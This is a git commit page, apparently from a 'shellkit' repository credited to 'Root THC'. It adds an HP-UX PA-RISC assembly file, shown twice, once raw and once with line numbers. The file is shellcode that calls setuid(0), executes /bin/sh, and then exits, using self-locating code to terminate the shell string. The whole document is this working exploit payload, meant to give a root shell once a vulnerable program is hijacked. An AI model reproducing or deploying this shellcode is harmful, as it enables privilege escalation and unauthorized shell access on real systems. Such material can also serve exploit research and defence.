initial

author: Root THC 2026-02-24 12:42:47 +0000
committer: Root THC 2026-02-24 12:42:47 +0000
commit: c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree: aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/tmp/hpux-tools/shell-two.s
parent: 073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
1 files changed, 41 insertions, 0 deletions
diff --git a/other/shellkit/tmp/hpux-tools/shell-two.s b/other/shellkit/tmp/hpux-tools/shell-two.s
new file mode 100644
index 0000000..5dac10f
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/shell-two.s
@@ -0,0 +1,41 @@
+    .SPACE $TEXT$
+    .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
+    .align 4
+    .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
+main
+    bl         shellcode, %r1
+    nop
+    .SUBSPA $DATA$
+    .EXPORT shellcode; So we could see it in debugger
+shellcode
+        xor     %r26, %r26, %r26; 0 - argv0
+        ldil    L%0xc0000000,%r1;  entry point
+        ldi     500, %r22       ;
+        ble     0x4(%sr7,%r1)   ;
+        subi    523, %r22, %r22 ; setuid(0)
+jump
+        bl      .+4,%r1      ; address into %r1
+        addi    500, %r1, %r3;
+        stb     %r0, SHELL-jump+7-11-500(%sr0,%r3)
+        xor     %r25, %r25, %r25; NULL ->arg1
+        ldi     SHELL-jump-11-500, %r26;
+        add     %r3, %r26, %r26;
+        ldil    L%0xc0000000,%r1;  entry point
+        ldi     500, %r22       ;
+        ble     0x4(%sr7,%r1)   ;
+        subi    511, %r22, %r22 ;
+        xor     %r26, %r26, %r26; return 0
+        ldil    L%0xc0000000,%r1;  entry point
+        ldi     500, %r22       ;
+        ble     0x4(%sr7,%r1)   ;
+        subi    501, %r22, %r22 ; exit 
+SHELL
+                .STRING "/bin/shA";
+endofshellcode
author	Root THC	2026-02-24 12:42:47 +0000
committer	Root THC	2026-02-24 12:42:47 +0000
commit	c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree	aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/tmp/hpux-tools/shell-two.s
parent	073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)

diff --git a/other/shellkit/tmp/hpux-tools/shell-two.s b/other/shellkit/tmp/hpux-tools/shell-two.s new file mode 100644 index 0000000..5dac10f --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/shell-two.s
@@ -0,0 +1,41 @@
	1	.SPACE $TEXT$
	2	.SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
	3
	4	.align 4
	5	.EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
	6	main
	7
	8	bl shellcode, %r1
	9	nop
	10	.SUBSPA $DATA$
	11	.EXPORT shellcode; So we could see it in debugger
	12	shellcode
	13	xor %r26, %r26, %r26; 0 - argv0
	14	ldil L%0xc0000000,%r1; entry point
	15	ldi 500, %r22 ;
	16	ble 0x4(%sr7,%r1) ;
	17	subi 523, %r22, %r22 ; setuid(0)
	18	jump
	19	bl .+4,%r1 ; address into %r1
	20	addi 500, %r1, %r3;
	21	stb %r0, SHELL-jump+7-11-500(%sr0,%r3)
	22
	23	xor %r25, %r25, %r25; NULL ->arg1
	24	ldi SHELL-jump-11-500, %r26;
	25	add %r3, %r26, %r26;
	26
	27	ldil L%0xc0000000,%r1; entry point
	28	ldi 500, %r22 ;
	29	ble 0x4(%sr7,%r1) ;
	30	subi 511, %r22, %r22 ;
	31
	32	xor %r26, %r26, %r26; return 0
	33	ldil L%0xc0000000,%r1; entry point
	34	ldi 500, %r22 ;
	35	ble 0x4(%sr7,%r1) ;
	36	subi 501, %r22, %r22 ; exit
	37
	38	SHELL
	39	.STRING "/bin/shA";
	40
	41	endofshellcode